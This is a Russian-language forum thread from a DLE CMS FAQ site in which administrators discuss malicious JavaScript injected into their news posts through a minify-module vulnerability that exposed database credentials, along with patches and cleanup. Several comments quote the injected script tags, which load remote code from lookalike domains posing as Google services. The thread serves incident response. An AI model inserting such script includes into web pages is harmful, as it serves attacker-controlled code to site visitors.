Задать вопрос
Не нравятся результаты поиска? Попробуйте другой поиск!
DLE FAQ » Все вопросы » Общие вопросы » ( ВИРУСЫ) На своих 5 сайтах заметил вредоносный .js код, как удалить ???

( ВИРУСЫ) На своих 5 сайтах заметил вредоносный .js код, как удалить ???

     26.09.2013    Все вопросы » Общие вопросы    4855

вопрос
Здравствуйте, сегодня на своих сайтах заметил вредоносный код, каким то образом в новости попал код .js
Версия dle 9.8 возможно кто то нашел дырку и размещает код, обновляйтесь на dle 10 и меняйте пароли на админа.

Вид кода такой:




Как почистить весь сайт и удалить данный скрипт ???

Ответил: vlits

ТАК ЧТО РЕБЯТА РЕШАЙТЕ ДЕЛЕМУ, ЭТО НЕ ТОЛЬКО У МЕНЯ, ЭТО МНОГО У КОГО :)
Успел предупредил, ставьте пачик по той ссылке что я написал.
http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html

17 комментариев

vlits
Юзер

vlits - 26 сентября 2013 17:20 -

чет код не видно было.
--script type="text/javascript" src="___google-statistics.ru/js/75d281aa6b0e43509bb8bf8d6e57ca28.js"></script
Trom
Юзер

Trom - 26 сентября 2013 17:26 -

Ищи шелл и поменяй пароль к ftp, но скорее всего пас админа от сайта сбрутили.
vlits
Юзер

vlits - 26 сентября 2013 17:41 -

по теме, надо ставить пачь, __dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html

информация об данной проблеме:
если не ставить пачь:


Зато может появится вот такой файлик minify_dbconfig.php.js_5cf6c499f8c1dd51050a5bf6981022a5 в папке кеша engine/cache/system/ который является копией файла настроек движка для доступа к базе данных. И злоумышленник успешно может слить всю базу себе и как бонус очистить все таблицы в ней доставив администратору ресурса массу неприятностей!!!
С появлением новых версий DLE появляются все новые и новые уязвимости которые не всегда есть возможность закрыть вовремя, но вы обязаны их искать и уведомлять своих покупателей о них.
И так, как у данной уязвимости степень опасности высокая - вы должны были прислать письмо на электронную почту, а не обвинять меня в халатности. Да, я не проверил обновлений вовремя, но я по крайней мере не предлагаю обновленную версию движка пользователям не проверив ее предварительно на уязвимости, используя которые злоумышленник может долго трепать нервы администратору сайта!!!


если в dle в админке проверять на вирусы, то находит что то такое, minify_dbconfig.php.js_5cf6c499f8c1dd51050a5bf6981022a5

так что кто то получил данные к бд и через бд в новости распихал вирус )))

ТАК ЧТО РЕБЯТА РЕШАЙТЕ ДЕЛЕМУ, ЭТО НЕ ТОЛЬКО У МЕНЯ, ЭТО МНОГО У КОГО :)
Успел предупредил, ставьте пачик по той ссылке что я написал.
http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html
dj-avtosh
PHP-developer

dj-avtosh - 26 сентября 2013 19:18 -

За денюшку почищу профессионально) Есть огромный опыт.
https://elkhan.ru
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.
doktorpull
Юзер

doktorpull - 17 февраля 2014 13:33 -

Сколько возьмешь чтобы сайт вновь стал индекстироваться яндексом
dj-avtosh
PHP-developer

dj-avtosh - 17 февраля 2014 21:32 -

В icq или skype
https://elkhan.ru
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.
vlits
Юзер

vlits - 27 сентября 2013 04:27 -

Да я и сам справлюсь. есть скрипты различные, предупредил вас ) что бы не наловили говна этого.
vlits
Юзер

vlits - 27 сентября 2013 05:36 -

пишут что данная заплатка не помогает, так что проблема актуальна !!!
решения вроде бы пока нет.
Бахмут
Юзер

Бахмут - 27 сентября 2013 07:53 -

Ничего подобного! Как только поставил заплатку - у меня сразу проблема исчезла данная.
vlits
Юзер

vlits - 27 сентября 2013 12:00 -

Если так то хорошо, просто народ пишет что проблема не решилась, по мимо заплатки нужно будет сменить пароль от базы и от админки сайта, но перед этим удалить данный вирус.
vlits
Юзер

vlits - 27 сентября 2013 14:09 -

Бахмут,
чем чистил бд от вирусов ?
FastFud
Юзер

FastFud - 27 сентября 2013 14:33 -

Делайте что написано на dle-news.ru

Потом бери базу данных и чисти ее с помощью notepad++ или другого. Восстанови базу и все.
vlits
Юзер

vlits - 27 сентября 2013 14:44 -

смешно база 40 и 80 метров ) я её не открою это раз )
а тут скрипт есть какой то: http://forum.searchengines.ru/showpost.php?p=12172854&postcount=147
FastFud
Юзер

FastFud - 27 сентября 2013 14:48 -

Ну тогда так делайте
vlits
Юзер

vlits - 27 сентября 2013 15:59 -

уже сделал, работает !
vlits
Юзер

vlits - 28 сентября 2013 13:02 -

У меня после заплатки тоже появился по новой вирусный код в БД. Потом поменял все пароли от админки(если админов несколько - то у всех), базы данных, сервера, FTP, mysql, пользователей БД. Больше скрипт не появлялся и файл minify_dbconfig.php.js по адресу engine/cache/system/ тоже перестал появляться. Так что кому не помогла заплатка - где-то профилонили и не поменяли пароли.
vlits
Юзер

vlits - 12 ноября 2013 04:54 -

На одном из моих сайтов, опять код новости заметил

<script src="http://adsense-google.ru/js/7230b2b03e2da37352abf1a659545b44.js" async="async" type="text/javascript">

</script>
<script src="http://google-statistics.ru/js/7230b2b03e2da37352abf1a659545b44.js" type="text/javascript" async="async">

</script>
Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы

 03.12.2011 rabidabi  Общие вопросы
 29.06.2013 Andy80  Общие вопросы
 18.09.2013 Бахмут  Общие вопросы
 05.01.2014 Ayk  Общие вопросы, Общие вопросы по PHP
 26.05.2014 Wensome  Общие вопросы, Хаки, Ламерские вопросы
 28.07.2014 Skyter  Общие вопросы
 06.08.2014 ig55555or  Общие вопросы, Общие вопросы по PHP
 07.11.2014 Crashlabs  Общие вопросы
 07.03.2015 onneuha  Общие вопросы
 12.05.2015 ArtuS  Общие вопросы, Общие вопросы по вёрстке
  • Jigurda | Как в description вставить значение доп. ... 2
    Фото Jigurda
    Jigurda
    Как в description вставить значение доп.поля?
    Сегодня, 10:54
    Немного не то. Нужно не заменить, а добавить к уже имеющемуся description свой текст с доп.полями
  • lutskboy | Как в description вставить значение доп. ... 2
    Фото lutskboy
    lutskboy
    Как в description вставить значение доп.поля?
    Вчера, 21:51
    https://sandev.pro/web/159-fullstory-metatags-by-sander.html
  • derebas | Как реализовать кнопку "Поделиться" как ... 1
    Фото derebas
    derebas
    Как реализовать кнопку "Поделиться" как на Плей Маркете?
    Вчера, 09:39
    Ну если на скорую руку то примерно так
    <style>
.sociallinks {
    display: none;
    position: fixed;
    z-index: 999;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    overflow: auto;
    background-color: rgba(0,0,0,0.4);
}

.sociallinks-content {
    background-color: #fefefe;
    margin: auto;
    padding: 20px;
    border: 1px solid #888;
    width: 80%;
    max-width: 500px;
    border-radius: 10px;
    position: absolute;
    left: 50%;
    top: 50%;
    transform: translate(-50%, -50%);
}

.close {
    color: #aaa;
    position: absolute;
    top: 10px;
    right: 10px;
    font-size: 28px;
    font-weight: bold;
}

.close:hover,
.close:focus {
    color: black;
    text-decoration: none;
    cursor: pointer;
}

.social-container {
    display: flex;
    align-items: center;
}
.social-container > div {
    margin-left: 10px;
}

h2, p {
    margin: 5px 0;
}
.social {
  padding-top: 20px;
}
.social img {
  margin: 10px;
}
.sharebtn {
  padding-top: 20px;
  width: 100%;
}
.sharebtn_area {
  border: 1px solid black;
  height: 40px;
}
.sharebtn input[type="text"] {
  width: 70%;
  border: none;
  height: 95%;
}
.sharebtn button {
  width: 25%;
  height: 95%;
  border: none;
  background-color: #fff;
}
</style>
<button id="opensociallinksBtn">Поделиться</button>

<div id="mysociallinks" class="sociallinks">
  <div class="sociallinks-content">
    <span class="close">×</span>
    <div class="social-container">
        <img src="{image-1}" alt="Icon" width="30" height="30">
        <div>
            <h2>{title}</h2> 
            <p>Поделиться</p> 
        </div>
    </div>
    <div class="social">
        <a href="https://api.whatsapp.com/send/?text={full-link}"><img src="whatsapp.png" alt="WhatsApp" width="30" height="30"></a>
        <a href="https://www.facebook.com/sharer/sharer.php?u={full-link}"><img src="facebook.png" alt="Facebook" width="30" height="30"></a>
        <a href="https://twitter.com/intent/post?url={full-link}"><img src="twitter.png" alt="Twitter" width="30" height="30"></a>
        <a href="https://www.instagram.com/share?url={full-link}"><img src="instagram.png" alt="Instagram" width="30" height="30"></a>
    </div>
    <div class="sharebtn">
      <div class="sharebtn_area">
        <input type="text" id="inputText" value="{full-link}" readonly="true">
        <button id="copyBtn">Поделиться <img src="share.png" width="10px" alt="Share Icon"></button>
      </div>
    </div>
  </div>
</div>

<script>
var sociallinks = document.getElementById("mysociallinks");
var opensociallinksBtn = document.getElementById("opensociallinksBtn");
var closeBtn = document.getElementsByClassName("close")[0];
var copyBtn = document.getElementById("copyBtn");
var inputText = document.getElementById("inputText");

opensociallinksBtn.onclick = function() {
  sociallinks.style.display = "block";
}

closeBtn.onclick = function() {
  sociallinks.style.display = "none";
}

window.onclick = function(event) {
  if (event.target == sociallinks) {
    sociallinks.style.display = "none";
  }
}

copyBtn.onclick = function() {
  inputText.select();
  document.execCommand("copy");
}
</script>
  • doktorpull | GeoIP - показ информации в зависимости о ... 1
    Фото doktorpull
    doktorpull
    GeoIP - показ информации в зависимости от страны посетителя сайта
    17-04-2024, 21:53
    Отличный модуль, хорошо работает. Рекомендую этого автора, так как заказывал у него несколько собственных разработок. Человек знает свое дело.
  • Gordi | Telegram Sender 12
    Фото Gordi
    Gordi
    Telegram Sender
    16-04-2024, 15:47
    купил. Модуль классный! Автору большая признательность!
  • TeraMoune | Как вывести тайтл и дискрипшен по маске ... 1
    Фото TeraMoune
    TeraMoune
    Как вывести тайтл и дискрипшен по маске в категориях?
    14-04-2024, 00:36
    Ну например вот так: https://lazydev.pro/product/12-dle-seo.html
  • zawibis | Как настроить редирект на внешние сайты? 1
    Фото zawibis
    zawibis
    Как настроить редирект на внешние сайты?
    13-04-2024, 14:53
    Нашёлся ответ.
    Нужно в настройках группы отключить параметр

    Автоматическая замена ссылок [url] в тег [leech]
    При включении данной опции все ссылки, которые пользователь публикует в теге [url], будут автоматически заменены на защищенные ссылки тега [leech]
  • TeraMoune | Как решить проблему с /xfsearch/значение ... 5
    Фото TeraMoune
    TeraMoune
    Как решить проблему с /xfsearch/значение?
    12-04-2024, 11:53
    Это не прикол, просто dle позволяет искать новости как по значению так и с указанием конкретного поля для этого значения. И если у вас стоят метрики на сайте то достаточно любому человеку открыть ссылку и убрать в ней что-то, если сайт при новом url вернёт статус 200 то метрики захотят этот url запомнить.
  • komosa | Как решить проблему с /xfsearch/значение ... 5
    Фото komosa
    komosa
    Как решить проблему с /xfsearch/значение?
    11-04-2024, 22:34
    А вот прикол то в том, что это коснулось только author
  • lutskboy | Как решить проблему с /xfsearch/значение ... 5
    Фото lutskboy
    lutskboy
    Как решить проблему с /xfsearch/значение?
    11-04-2024, 22:31
    может быть не один только author. и другие поля. как знать куда перенаправлять
наверх